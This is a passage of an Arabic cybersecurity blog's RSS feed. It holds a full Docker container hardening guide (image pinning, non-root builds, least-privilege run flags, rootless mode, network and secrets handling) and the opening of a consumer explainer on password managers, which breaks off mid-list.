<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>مدونة سايبربيديا</title><description>مقالات عربية مبسّطة وموثوقة في الأمن السيبراني والسلامة الرقمية واختبار الاختراق والشبكات والمسار المهني، يكتبها فريق سايبربيديا.</description><link>https://blog.cyberpedia.site/</link><language>ar</language><item><title>تأمين Docker وتقويته: دليل عملي لحماية الحاويات</title><link>https://blog.cyberpedia.site/docker-security-hardening/</link><guid isPermaLink="true">https://blog.cyberpedia.site/docker-security-hardening/</guid><description>دليل عملي لتأمين Docker وتقوية الحاويات: صور آمنة، وبناء دون أسرار، وتشغيل بأقل الصلاحيات، وحماية المضيف والشبكة، مع أوامر وأمثلة جاهزة للتطبيق.</description><pubDate>Sat, 10 Oct 2026 17:08:22 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تأمين Docker يعني تقليل الصلاحيات وسطح الهجوم في أربع طبقات: صورة صغيرة موثوقة ومفحوصة، وبناء بمستخدم غير جذري ودون أسرار، وتشغيل بخيارات مثل --cap-drop ALL و--read-only و no-new-privileges، ومضيف محدّث يعمل بالوضع غير الجذري ولا يكشف مقبس Docker لأي حاوية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تعمل Docker اليوم في قلب معظم بيئات التطوير والإنتاج، لكن سهولة تشغيل حاوية بأمر واحد تخفي إعدادات افتراضية لم تُصمَّم لأقصى درجات الأمان. تقوية الأمان (Hardening) تعني أن تغلق هذه الثغرات طبقة بعد طبقة: من الصورة، إلى البناء، إلى التشغيل، وصولاً إلى المضيف نفسه.&lt;/p&gt;
&lt;h2 id=&quot;لماذا-لا-تكون-حاويات-docker-آمنة-افتراضياً&quot;&gt;لماذا لا تكون حاويات Docker آمنة افتراضياً؟&lt;/h2&gt;
&lt;p&gt;لأن الحاوية ليست آلة افتراضية: كل الحاويات تتشارك نواة (Kernel) نظام المضيف نفسه، وأي ثغرة في النواة أو إعداد متساهل قد يفتح طريقاً للهروب من الحاوية (Container Escape) إلى المضيف.&lt;/p&gt;
&lt;p&gt;وتزيد بعض الإعدادات الافتراضية من هذا الخطر:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;العملية داخل الحاوية تعمل بصلاحيات &lt;code&gt;root&lt;/code&gt; ما لم تحدد مستخدماً آخر.&lt;/li&gt;
&lt;li&gt;خدمة Docker (Docker Daemon) تعمل بصلاحيات &lt;code&gt;root&lt;/code&gt; على المضيف في التثبيت العادي.&lt;/li&gt;
&lt;li&gt;عضوية مجموعة &lt;code&gt;docker&lt;/code&gt; تكافئ عملياً صلاحيات &lt;code&gt;root&lt;/code&gt; على المضيف، لأنها تسمح بتشغيل أي حاوية بأي إعدادات.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;وإذا كنت جديداً على مفهوم التقوية عموماً، فابدأ بمقال &lt;a href=&quot;https://blog.cyberpedia.site/cybersecurity-hardening/&quot;&gt;Cybersecurity Hardening النهج الاستباقي لحماية الأنظمة&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;أين-تضع-الحماية-في-دورة-حياة-الحاوية&quot;&gt;أين تضع الحماية في دورة حياة الحاوية؟&lt;/h2&gt;
&lt;p&gt;تحتاج الحماية إلى أربع طبقات متتالية، وضعف أي طبقة منها قد يُسقط فائدة الطبقات الأخرى.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط يوضح طبقات تأمين Docker الأربع: الصورة ثم البناء ثم التشغيل ثم المضيف&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.DGfOwTks_Z2nvDEi.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;أربع طبقات لتأمين Docker: الصورة والبناء والتشغيل والمضيف&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;كيف-تؤمّن-صورة-الحاوية-docker-image&quot;&gt;كيف تؤمّن صورة الحاوية (Docker Image)؟&lt;/h2&gt;
&lt;p&gt;ابدأ بصورة أساس (Base Image) صغيرة ومن مصدر موثوق، لأن كل حزمة إضافية في الصورة ثغرة محتملة. الصور الرسمية (Official Images)، والصور المصغّرة مثل &lt;code&gt;alpine&lt;/code&gt; و&lt;code&gt;slim&lt;/code&gt; وصور Distroless، تقلل سطح الهجوم كثيراً.&lt;/p&gt;
&lt;h3 id=&quot;ثبّت-الصورة-بدل-الوسم-المتغير&quot;&gt;ثبّت الصورة بدل الوسم المتغير&lt;/h3&gt;
&lt;p&gt;الوسم &lt;code&gt;latest&lt;/code&gt; قد يشير غداً إلى صورة مختلفة عن اليوم. ثبّت الإصدار، والأفضل أن تثبّت البصمة (Digest) حتى تضمن أنك تبني دائماً من الصورة نفسها:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;dockerfile&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;FROM&lt;/span&gt;&lt;span&gt; python:3.12-slim@sha256:&amp;lt;digest&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;هذا مهم أيضاً للحماية من &lt;a href=&quot;https://blog.cyberpedia.site/supply-chain-attack/&quot;&gt;هجمات سلاسل التوريد&lt;/a&gt;، حيث يُستبدل مكوّن موثوق بآخر خبيث.&lt;/p&gt;
&lt;h3 id=&quot;افحص-الصورة-من-الثغرات-قبل-النشر&quot;&gt;افحص الصورة من الثغرات قبل النشر&lt;/h3&gt;
&lt;p&gt;استخدم أداة فحص مثل Trivy أو Docker Scout، واجعل الفحص خطوة إلزامية في خط النشر (CI/CD) تمنع نشر أي صورة فيها ثغرات حرجة:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;trivy&lt;/span&gt;&lt;span&gt; image&lt;/span&gt;&lt;span&gt; myapp:1.4.0&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;docker&lt;/span&gt;&lt;span&gt; scout&lt;/span&gt;&lt;span&gt; cves&lt;/span&gt;&lt;span&gt; myapp:1.4.0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;كيف-تبني-صورة-آمنة-في-dockerfile&quot;&gt;كيف تبني صورة آمنة في Dockerfile؟&lt;/h2&gt;
&lt;p&gt;القاعدة: الصورة النهائية تحتوي ما يحتاجه التطبيق ليعمل فقط، وتعمل بمستخدم عادي. البناء متعدد المراحل (Multi-stage Build) يحقق ذلك: المرحلة الأولى &lt;code&gt;build&lt;/code&gt; تحتوي أدوات الترجمة وتُخرج الملف التنفيذي، والمرحلة الثانية تنسخ هذا الملف وحده إلى صورة إنتاج صغيرة لا تحتوي حتى على Shell.&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;dockerfile&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;FROM&lt;/span&gt;&lt;span&gt; golang:1.22 &lt;/span&gt;&lt;span&gt;AS&lt;/span&gt;&lt;span&gt; build&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;WORKDIR&lt;/span&gt;&lt;span&gt; /src&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;COPY&lt;/span&gt;&lt;span&gt; . .&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;RUN&lt;/span&gt;&lt;span&gt; CGO_ENABLED=0 go build -o /app ./cmd/server&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;FROM&lt;/span&gt;&lt;span&gt; gcr.io/distroless/static-debian12&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;COPY&lt;/span&gt;&lt;span&gt; --from=build /app /app&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;USER&lt;/span&gt;&lt;span&gt; 10001:10001&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ENTRYPOINT&lt;/span&gt;&lt;span&gt; [&lt;/span&gt;&lt;span&gt;&quot;/app&quot;&lt;/span&gt;&lt;span&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;وانتبه لثلاث نقاط أخرى أثناء البناء:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;لا تضع كلمات المرور أو المفاتيح في &lt;code&gt;ENV&lt;/code&gt; أو في ملفات تنسخها إلى الصورة، فكل طبقة يمكن استخراجها لاحقاً.&lt;/li&gt;
&lt;li&gt;أضف ملف &lt;code&gt;.dockerignore&lt;/code&gt; يستبعد ملفات مثل &lt;code&gt;.env&lt;/code&gt; و&lt;code&gt;.git&lt;/code&gt; ومفاتيح SSH.&lt;/li&gt;
&lt;li&gt;إذا احتجت سراً أثناء البناء فقط، مرّره عبر BuildKit حتى لا يُحفظ في أي طبقة.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;dockerfile&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;RUN&lt;/span&gt;&lt;span&gt; --mount=type=secret,id=npm_token \&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    NPM_TOKEN=$(cat /run/secrets/npm_token) npm ci&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;docker&lt;/span&gt;&lt;span&gt; build&lt;/span&gt;&lt;span&gt; --secret&lt;/span&gt;&lt;span&gt; id=npm_token,src=./npm_token.txt&lt;/span&gt;&lt;span&gt; -t&lt;/span&gt;&lt;span&gt; myapp&lt;/span&gt;&lt;span&gt; .&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;كيف-تشغّل-الحاوية-بأقل-صلاحيات-ممكنة&quot;&gt;كيف تشغّل الحاوية بأقل صلاحيات ممكنة؟&lt;/h2&gt;
&lt;p&gt;مبدأ أقل الصلاحيات (Least Privilege) هو جوهر تأمين التشغيل: امنح الحاوية ما تحتاجه فقط، واسحب الباقي.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مقارنة بين تشغيل حاوية Docker بالإعدادات الافتراضية وتشغيلها بخيارات التقوية&quot; width=&quot;1600&quot; height=&quot;973&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.B7NV8sGP_igB1e.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;الفرق بين أمر التشغيل الافتراضي وأمر التشغيل المُحصَّن&lt;/em&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;الخيار&lt;/th&gt;
&lt;th&gt;ما الذي يحميك منه&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--user 10001&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;يمنع تشغيل التطبيق بصلاحيات &lt;code&gt;root&lt;/code&gt; داخل الحاوية&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--read-only&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;يمنع المهاجم من تعديل الملفات أو زرع أدوات داخل الحاوية&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--cap-drop ALL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;يسحب قدرات لينكس (Linux Capabilities) كلها، ثم تضيف ما يلزم فقط بـ &lt;code&gt;--cap-add&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--security-opt no-new-privileges&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;يمنع العمليات من رفع صلاحياتها عبر ملفات &lt;code&gt;setuid&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--memory&lt;/code&gt; و&lt;code&gt;--cpus&lt;/code&gt; و&lt;code&gt;--pids-limit&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;تحدّ من استنزاف موارد المضيف، مثل هجمات Fork Bomb&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;وإذا احتاج التطبيق مكاناً مؤقتاً للكتابة مع &lt;code&gt;--read-only&lt;/code&gt;، فأضف &lt;code&gt;--tmpfs /tmp&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&quot;إعدادات-يجب-ألا-تراها-في-بيئة-الإنتاج&quot;&gt;إعدادات يجب ألا تراها في بيئة الإنتاج&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;الخيار &lt;code&gt;--privileged&lt;/code&gt;: يمنح الحاوية صلاحيات شبه كاملة على المضيف ويعطّل معظم طبقات العزل.&lt;/li&gt;
&lt;li&gt;تعطيل ملفات الحماية بخيار &lt;code&gt;--security-opt seccomp=unconfined&lt;/code&gt; أو &lt;code&gt;apparmor=unconfined&lt;/code&gt;. أبقِ ملف Seccomp الافتراضي وملف AppArmor أو SELinux مفعّلين.&lt;/li&gt;
&lt;li&gt;ربط مقبس Docker (&lt;code&gt;/var/run/docker.sock&lt;/code&gt;) داخل الحاوية، فمن يصل إليه يتحكم بخدمة Docker، أي بالمضيف كاملاً.&lt;/li&gt;
&lt;li&gt;مشاركة نطاقات المضيف مثل &lt;code&gt;--pid=host&lt;/code&gt; و&lt;code&gt;--network=host&lt;/code&gt; دون حاجة حقيقية.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;الإعدادات-نفسها-في-docker-compose&quot;&gt;الإعدادات نفسها في Docker Compose&lt;/h3&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;yaml&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;services&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  web&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    image&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;myapp:1.4.0&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    user&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;&quot;10001:10001&quot;&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    read_only&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;true&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    tmpfs&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;      - &lt;/span&gt;&lt;span&gt;/tmp&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    cap_drop&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;      - &lt;/span&gt;&lt;span&gt;ALL&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    security_opt&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;      - &lt;/span&gt;&lt;span&gt;no-new-privileges:true&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    mem_limit&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;512m&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    pids_limit&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;100&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;كيف-تحمي-مضيف-docker-وخدمته&quot;&gt;كيف تحمي مضيف Docker وخدمته؟&lt;/h2&gt;
&lt;p&gt;المضيف هو الهدف الأخير لأي هجوم على الحاويات، وحمايته تبدأ بالتحديث المستمر لـ Docker Engine ولنواة النظام، لأن ثغرات الهروب من الحاوية تُصلَح عادةً هناك.&lt;/p&gt;
&lt;p&gt;ثم طبّق هذه الإعدادات:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;شغّل Docker في الوضع غير الجذري (Rootless Mode)، فتعمل الخدمة والحاويات بمستخدم عادي، ولا يحصل المهاجم على &lt;code&gt;root&lt;/code&gt; حتى لو هرب من الحاوية.&lt;/li&gt;
&lt;li&gt;إن لم يناسبك الوضع غير الجذري، فعّل عزل نطاق المستخدمين (User Namespaces) ليصبح &lt;code&gt;root&lt;/code&gt; داخل الحاوية مستخدماً عادياً على المضيف.&lt;/li&gt;
&lt;li&gt;لا تفتح واجهة Docker على الشبكة عبر TCP دون تشفير TLS ومصادقة بالشهادات، فالمنفذ &lt;code&gt;2375&lt;/code&gt; غير المشفّر يعني تحكماً كاملاً بالمضيف لأي شخص يصل إليه.&lt;/li&gt;
&lt;li&gt;قيّد عضوية مجموعة &lt;code&gt;docker&lt;/code&gt; بأضيق نطاق ممكن.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;مثال لملف إعدادات الخدمة &lt;code&gt;/etc/docker/daemon.json&lt;/code&gt;:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;json&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;{&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  &quot;userns-remap&quot;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;&quot;default&quot;&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  &quot;no-new-privileges&quot;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;true&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  &quot;icc&quot;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;false&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;يفعّل هذا الملف عزل نطاق المستخدمين، ويمنع رفع الصلاحيات في كل الحاويات افتراضياً، ويوقف الاتصال المفتوح بين الحاويات على الشبكة الافتراضية.&lt;/p&gt;
&lt;p&gt;وللتدقيق الدوري، شغّل أداة &lt;code&gt;docker-bench-security&lt;/code&gt; التي تفحص المضيف وفق معيار CIS Docker Benchmark، وتعطيك تقريراً بالإعدادات المخالفة.&lt;/p&gt;
&lt;h2 id=&quot;كيف-تؤمّن-شبكة-الحاويات&quot;&gt;كيف تؤمّن شبكة الحاويات؟&lt;/h2&gt;
&lt;p&gt;افصل الحاويات في شبكات مستقلة حسب وظيفتها، ولا تنشر إلا المنافذ التي يجب أن يصل إليها أحد من الخارج.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;أنشئ شبكات خاصة (User-defined Networks) لكل تطبيق بدل الشبكة الافتراضية &lt;code&gt;bridge&lt;/code&gt;، واجعل قاعدة البيانات في شبكة داخلية لا يصل إليها إلا التطبيق.&lt;/li&gt;
&lt;li&gt;انشر المنافذ الداخلية على العنوان المحلي فقط: &lt;code&gt;-p 127.0.0.1:5432:5432&lt;/code&gt; بدل &lt;code&gt;-p 5432:5432&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;انتبه إلى أن المنافذ التي تنشرها Docker تتجاوز قواعد جدار الحماية UFW على لينكس، لأن Docker تضيف قواعد &lt;code&gt;iptables&lt;/code&gt; خاصة بها. لا تعتمد على UFW وحده لإغلاق منفذ نشرته بنفسك.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-تتعامل-مع-الأسرار&quot;&gt;كيف تتعامل مع الأسرار؟&lt;/h2&gt;
&lt;p&gt;تجنّب تمرير كلمات المرور عبر متغيرات البيئة (Environment Variables)، لأنها تظهر في &lt;code&gt;docker inspect&lt;/code&gt; وقد تظهر في سجلات بعض الأدوات. استخدم أسرار Docker Compose أو Swarm، فهي تُركَّب ملفات داخل &lt;code&gt;/run/secrets/&lt;/code&gt; ولا تُحفظ في الصورة:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;yaml&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;services&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  db&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    image&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;postgres:16&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    environment&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;      POSTGRES_PASSWORD_FILE&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;/run/secrets/db_password&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    secrets&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;      - &lt;/span&gt;&lt;span&gt;db_password&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;secrets&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;  db_password&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    file&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;./db_password.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;وفي البيئات الكبيرة، يُفضَّل مدير أسرار مخصص مثل HashiCorp Vault أو خدمات إدارة الأسرار لدى مزوّد &lt;a href=&quot;https://blog.cyberpedia.site/cloud-computing/&quot;&gt;الحوسبة السحابية&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;قائمة-تحقق-سريعة-لتأمين-docker&quot;&gt;قائمة تحقق سريعة لتأمين Docker&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;صورة أساس صغيرة وموثوقة ومثبّتة بالبصمة.&lt;/li&gt;
&lt;li&gt;فحص الثغرات في كل بناء، ومنع نشر الصور ذات الثغرات الحرجة.&lt;/li&gt;
&lt;li&gt;مستخدم غير جذري عبر &lt;code&gt;USER&lt;/code&gt; في كل Dockerfile.&lt;/li&gt;
&lt;li&gt;لا أسرار في الصورة أو في متغيرات البيئة.&lt;/li&gt;
&lt;li&gt;الخيارات &lt;code&gt;--cap-drop ALL&lt;/code&gt; و&lt;code&gt;no-new-privileges&lt;/code&gt; و&lt;code&gt;--read-only&lt;/code&gt; وحدود الموارد عند التشغيل.&lt;/li&gt;
&lt;li&gt;لا &lt;code&gt;--privileged&lt;/code&gt; ولا ربط لمقبس &lt;code&gt;docker.sock&lt;/code&gt; داخل الحاويات.&lt;/li&gt;
&lt;li&gt;Docker والنواة محدّثان، مع الوضع غير الجذري أو عزل نطاق المستخدمين.&lt;/li&gt;
&lt;li&gt;شبكات منفصلة ومنافذ منشورة على الحد الأدنى.&lt;/li&gt;
&lt;li&gt;تدقيق دوري بأداة &lt;code&gt;docker-bench-security&lt;/code&gt;، ومراقبة سلوك الحاويات أثناء التشغيل بأدوات مثل Falco.&lt;/li&gt;
&lt;/ol&gt;
</content:encoded><category>الأمن السيبراني</category><category>Docker</category><category>الحاويات</category><category>Hardening</category><category>أمن الخوادم</category><category>DevSecOps</category></item><item><title>مدير كلمات المرور: ما هو ولماذا تحتاج إليه؟</title><link>https://blog.cyberpedia.site/password-managers-guide/</link><guid isPermaLink="true">https://blog.cyberpedia.site/password-managers-guide/</guid><description>تعرّف على مدير كلمات المرور (Password Manager) وكيف يحمي حساباتك، وكيف يعمل تشفير الخزنة، وكيف تختار أداة مناسبة وتبدأ باستخدامها بخطوات عملية.</description><pubDate>Sat, 10 Oct 2026 16:52:43 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;مدير كلمات المرور برنامج يولّد لكل حساب كلمة مرور طويلة وفريدة ويحفظها في خزنة مشفّرة لا يفتحها إلا مفتاح واحد تحفظه أنت. يحميك من إعادة استخدام كلمات المرور ومن مواقع التصيد، ويكفيك أن تتذكر كلمة سر رئيسية واحدة فقط.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;معظمنا يملك عشرات الحسابات، ولا يستطيع أحد أن يحفظ لكل حساب كلمة مرور قوية ومختلفة. فيلجأ الناس إلى حلّين سيئين: كلمة مرور بسيطة، أو كلمة واحدة تتكرر في كل مكان. مدير كلمات المرور وُجد ليحل هذه المشكلة تحديداً.&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-مدير-كلمات-المرور-password-manager&quot;&gt;ما هو مدير كلمات المرور (Password Manager)؟&lt;/h2&gt;
&lt;p&gt;مدير كلمات المرور تطبيق أو إضافة متصفح يحفظ بيانات دخولك في &lt;strong&gt;خزنة مشفّرة&lt;/strong&gt;، ويولّد لك كلمات مرور عشوائية طويلة، ويعبّئها عنك عند تسجيل الدخول. أنت لا تتذكر إلا كلمة مرور رئيسية واحدة تفتح الخزنة.&lt;/p&gt;
&lt;p&gt;يمكن أن يكون الحل سحابياً يزامن بياناتك بين أجهزتك، أو محلياً يحفظ الملف على جهازك فقط، مثل Bitwarden وKeePassXC.&lt;/p&gt;
&lt;h2 id=&quot;لماذا-لا-تكفي-الكلمات-التي-نحفظها-في-رؤوسنا&quot;&gt;لماذا لا تكفي الكلمات التي نحفظها في رؤوسنا؟&lt;/h2&gt;
&lt;p&gt;لأن الخطر الحقيقي ليس في صعوبة تخمين الكلمة، بل في تكرارها. عندما يتسرب حساب واحد من موقع ضعيف، يجرّب المهاجمون الكلمة نفسها على البريد وحسابات التواصل والبنوك. هذا النوع من الهجمات يُسمّى حشو بيانات الاعتماد (Credential Stuffing).&lt;/p&gt;
&lt;p&gt;وتتكرر هذه القصة في حوادث اختراق الحسابات، كما شرحنا في مقال &lt;a href=&quot;https://blog.cyberpedia.site/instagram-hacking/&quot;&gt;احذر من اختراق حسابك على انستغرام&lt;/a&gt;. كلمة مرور فريدة لكل حساب تجعل التسريب محصوراً في حساب واحد.&lt;/p&gt;
&lt;h2 id=&quot;كيف-يعمل-مدير-كلمات-المرور&quot;&gt;كيف يعمل مدير كلمات المرور؟&lt;/h2&gt;
&lt;p&gt;الفكرة أن بياناتك تُشفَّر على جهازك قبل أي مزامنة، وأن المفتاح مشتق من كلمتك الرئيسية. لذلك حتى لو سُرقت نسخة الخزنة من الخادم، فهي بيانات مشفّرة لا معنى لها دون المفتاح.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط يوضح مراحل عمل مدير كلمات المرور من الكلمة الرئيسية إلى التعبئة التلقائية الآمنة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.D_UutDWy_ZGXWNN.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;رحلة كلمة المرور داخل مدير كلمات المرور&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;كيف-يحميك-من-مواقع-التصيد&quot;&gt;كيف يحميك من مواقع التصيد؟&lt;/h2&gt;
&lt;p&gt;مدير كلمات المرور يربط كل بيان دخول بعنوان الموقع الحقيقي. فإذا فتحت صفحة مزيفة تشبه موقع البنك، لن يعبّئ بياناتك لأن عنوانها مختلف. هذا التنبيه الصامت يكشف التصيد حتى عندما تنخدع عيناك، وهو النوع الذي رأيناه في &lt;a href=&quot;https://blog.cyberpedia.site/phishing-in-ramadan/&quot;&gt;قصة التصيد الرمضانية&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;ما-أبرز-المخاطر-والعيوب&quot;&gt;ما أبرز المخاطر والعيوب؟&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;نقطة مركزية&lt;/strong&gt;: الخزنة تجمع كل بياناتك، لذا يجب أن تكون كلمتها الرئيسية قوية جداً.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;نسيان الكلمة الرئيسية&lt;/strong&gt;: في معظم الأدوات لا يمكن لأحد استعادتها لك، وهذا من مزايا التصميم الآمن.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;اختراق الجهاز&lt;/strong&gt;: برنامج خبيث على جهازك قد يلتقط ما تكتبه، فالحماية تبدأ من جهاز نظيف ومحدّث.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-تختار-مدير-كلمات-مرور-مناسباً&quot;&gt;كيف تختار مدير كلمات مرور مناسباً؟&lt;/h2&gt;
&lt;p&gt;ابحث عن هذه النقاط قبل أن تقرر:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;تشفير تنتهي مفاتيحه عند المستخدم، دون وصول الشركة إلى بياناتك.&lt;/li&gt;
&lt;li&gt;دعم المصادقة الثنائية (Two-Factor Authentication) لحماية الخزنة نفسها.&lt;/li&gt;
&lt;li&gt;تطبيقات لأجهزتك كلها: الهاتف والحاسوب والمتصفح.&lt;/li&gt;
